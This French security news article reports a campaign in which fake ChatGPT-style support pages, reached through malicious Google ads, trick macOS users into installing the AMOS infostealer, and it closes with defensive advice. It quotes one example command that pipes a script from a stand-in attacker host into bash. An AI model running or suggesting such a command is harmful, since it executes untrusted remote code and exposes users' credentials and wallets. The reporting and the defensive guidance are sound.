Un faux support ChatGPT installe le voleur d’informations AMOS sur macOS

De fausses sessions d’assistance ChatGPT sont utilisées pour inciter les utilisateurs de macOS à installer le voleur d’informations AMOS au moyen de commandes de terminal malveillantes.

Written By
Ken Underhill
Ken Underhill
Dec 12, 2025
5 minute read
eSecurity Planet content and product recommendations are editorially independent. We may make money when you click on links to our partners. Learn More

Une nouvelle campagne de malwares exploite la confiance des utilisateurs envers les outils d’assistance basés sur l’IA, en utilisant de fausses sessions de dépannage ChatGPT pour infecter des appareils macOS avec l’InfoStealer AMOS. 

Les victimes qui recherchent des solutions simples — comme la résolution de problèmes de son — sont redirigées par des annonces Google malveillantes vers une interface convaincante similaire à ChatGPT, qui fournit une commande de terminal déguisée en réparation du système.

Une fois le malware installé, il « a réussi à exfiltrer des données sensibles du système », ont indiqué les chercheurs de Kroll. 

De l’annonce dans les résultats de recherche à la compromission du système

Contrairement aux campagnes d’hameçonnage traditionnelles qui reposent sur de faux installateurs, des pièces jointes ou des téléchargements manifestement suspects, cette attaque est conçue pour sembler ordinaire et digne de confiance. 

Les victimes découvrent des contenus malveillants intégrés aux résultats de recherche ou à des annonces qui semblent proposer des conseils de dépannage légitimes. 

L’interaction reproduit un échange d’assistance classique : l’utilisateur explique un problème, reçoit une réponse claire et faisant autorité, puis est invité à exécuter une unique commande de terminal pour « résoudre » le problème. C’est ce moment de confiance qui déclenche la compromission.

La commande fournie par l’attaquant suit un modèle familier de commande en une ligne, couramment utilisé par les développeurs et les professionnels de l’informatique :

     curl -s https://attacker-example[.]com/installer.sh | bash

À première vue, cela ressemble à une méthode standard pour installer des outils open source ou appliquer rapidement des correctifs. 

En réalité, ce pipeline télécharge et exécute immédiatement un script shell distant sans laisser à l’utilisateur la possibilité d’en examiner le contenu. 

Ce comportement correspond directement à des techniques MITRE ATT&CK telles que Exécution par l’utilisateur et le transfert d’outils entrants, dans lesquelles les attaquants s’appuient sur des utilitaires système légitimes pour amorcer la diffusion du malware.

Advertisement

Une fois exécuté, le script installe silencieusement le voleur d’informations AMOS, met en place des mécanismes de persistance pour survivre aux redémarrages et commence à récupérer des données sensibles telles que des identifiants de navigateur, des cookies et des portefeuilles de cryptomonnaies. 

Comme l’activité se déroule dans le terminal et exploite les outils intégrés de macOS, elle évite de déclencher les invites d’installation habituelles, les avertissements de Gatekeeper ou d’autres boîtes de dialogue de sécurité visibles, permettant à l’infection de progresser largement à l’insu de l’utilisateur.

Les chercheurs de Kroll soulignent que l’efficacité de la campagne est encore amplifiée par l’infrastructure qui la sous-tend. 

Les annonces et pages d’atterrissage malveillantes utilisent des domaines et une image de marque qui ressemblent étroitement à ceux de services légitimes, réduisant considérablement la méfiance des utilisateurs et augmentant la probabilité que les cibles suivent les instructions fournies. 

Pourquoi l’ingénierie sociale fondée sur l’IA fonctionne

Cette technique est efficace parce qu’elle exploite une norme comportementale en plein essor : le recours aux outils d’IA pour obtenir rapidement des conseils de dépannage faisant autorité.

En présentant le leurre dans une interface entièrement interactive similaire à ChatGPT plutôt que sur une page d’hameçonnage statique, l’expérience semble familière et digne de confiance pour les utilisateurs. 

Le processus reproduit fidèlement les interactions d’assistance légitimes — identifier un problème, recevoir un diagnostic et exécuter une commande suggérée —, ce qui réduit les défenses et encourage l’obéissance. 

La visibilité est encore amplifiée par l’empoisonnement des moteurs de recherche au moyen d’annonces sponsorisées, qui placent les contenus malveillants là où les utilisateurs sont le plus susceptibles de les rencontrer. 

Présenter la charge utile comme une commande de réparation macOS ordinaire favorise une exécution rapide, tandis que l’absence de téléchargements traditionnels, de boîtes de dialogue d’installation ou de demandes d’authentification élimine les frictions qui pourraient autrement éveiller les soupçons. 

Advertisement

Ensemble, ces éléments offrent aux attaquants un point d’entrée très fiable tant dans les systèmes personnels non gérés que dans les environnements d’entreprise utilisant le BYOD.

Réduire les risques liés à l’ingénierie sociale pilotée par l’IA

Les attaques d’ingénierie sociale fondées sur le terminal gagnent en efficacité à mesure que les utilisateurs se sentent plus à l’aise pour suivre les conseils de dépannage générés par l’IA. 

Plutôt que d’exploiter des failles logicielles, ces campagnes s’appuient sur la confiance, les processus habituels et les outils système légitimes pour établir discrètement la compromission. 

Se défendre contre cette technique nécessite des contrôles en couches qui limitent l’exécution de commandes à risque, détectent rapidement les abus et réduisent l’impact du vol d’identifiants.

  • Sensibilisez les employés afin qu’ils considèrent comme hautement risquées les instructions de terminal provenant de conversations avec une IA, d’annonces ou de sites de dépannage inconnus, et qu’ils évitent d’exécuter des commandes non vérifiées.
  • Déployez sur macOS une solution de détection des terminaux et de réponse capable de surveiller et de bloquer les activités suspectes du shell, notamment les pipelines cURL, l’exécution de bash et les tentatives de persistance.
  • Limitez l’exécution des commandes en bloquant les schémas de type curl | bash ou en déclenchant des alertes, en imposant la signature des scripts et en limitant l’utilisation du shell aux utilisateurs et appareils approuvés.
  • Mettez en œuvre le filtrage DNS, web et des connexions sortantes afin de bloquer les domaines nouvellement enregistrés ou malveillants et de réduire l’exposition aux infrastructures de diffusion reposant sur les moteurs de recherche et les annonces.
  • Renforcez les protections de l’identité et des identifiants en imposant une authentification multifacteur résistante à l’hameçonnage, en limitant les accès administrateur locaux et en décourageant le stockage des identifiants professionnels dans les navigateurs.
  • En continu, surveillez les indicateurs de compromission (IoC), notamment les connexions sortantes anormales, les changements de configuration et les accès à des identifiants ou à des jetons, et testez les détections au moyen de simulations régulières.

Ensemble, ces mesures aident les organisations à réduire leur exposition aux attaques basées sur le terminal tout en préservant des processus pratiques et efficaces pour les utilisateurs finaux.

Les attaquants instrumentalisent la confiance envers l’IA

Cette campagne illustre une évolution plus large des tactiques des attaquants, les interfaces de type IA remplaçant les pages d’hameçonnage traditionnelles comme mécanisme de diffusion privilégié. 

À mesure que les utilisateurs se sentent plus à l’aise pour s’appuyer sur des outils conversationnels afin d’obtenir de l’aide et des conseils, les adversaires sont de plus en plus capables d’imiter ces interactions avec une précision convaincante. 

La campagne AMOS montre comment une simple commande copiée-collée — exécutée par un utilisateur qui croit suivre les conseils légitimes d’une IA — peut compromettre presque instantanément un système macOS. 

À mesure que l’IA s’intègre davantage aux processus quotidiens d’assistance et de productivité, les attaquants continueront d’exploiter cette confiance, faisant des leurres utilisant l’image de l’IA un risque croissant et persistant dont les organisations doivent tenir compte dans leurs modèles de sécurité.

Advertisement

l’attention de la défense se porte désormais sur la détection de contenus manipulés et synthétiques.

Ken Underhill

Ken Underhill is an award-winning cybersecurity professional, bestselling author, and seasoned IT professional. He holds a graduate degree in cybersecurity and information assurance from Western Governors University and brings years of hands-on experience to the field.

eSecurity Planet Logo

eSecurity Planet is a leading resource for IT professionals at large enterprises who are actively researching cybersecurity vendors and latest trends. eSecurity Planet focuses on providing instruction for how to approach common security challenges, as well as informational deep-dives about advanced cybersecurity topics.

Property of TechnologyAdvice. © 2026 TechnologyAdvice. All Rights Reserved

Advertiser Disclosure: Some of the products that appear on this site are from companies from which TechnologyAdvice receives compensation. This compensation may impact how and where products appear on this site including, for example, the order in which they appear. TechnologyAdvice does not include all companies or all types of products available in the marketplace.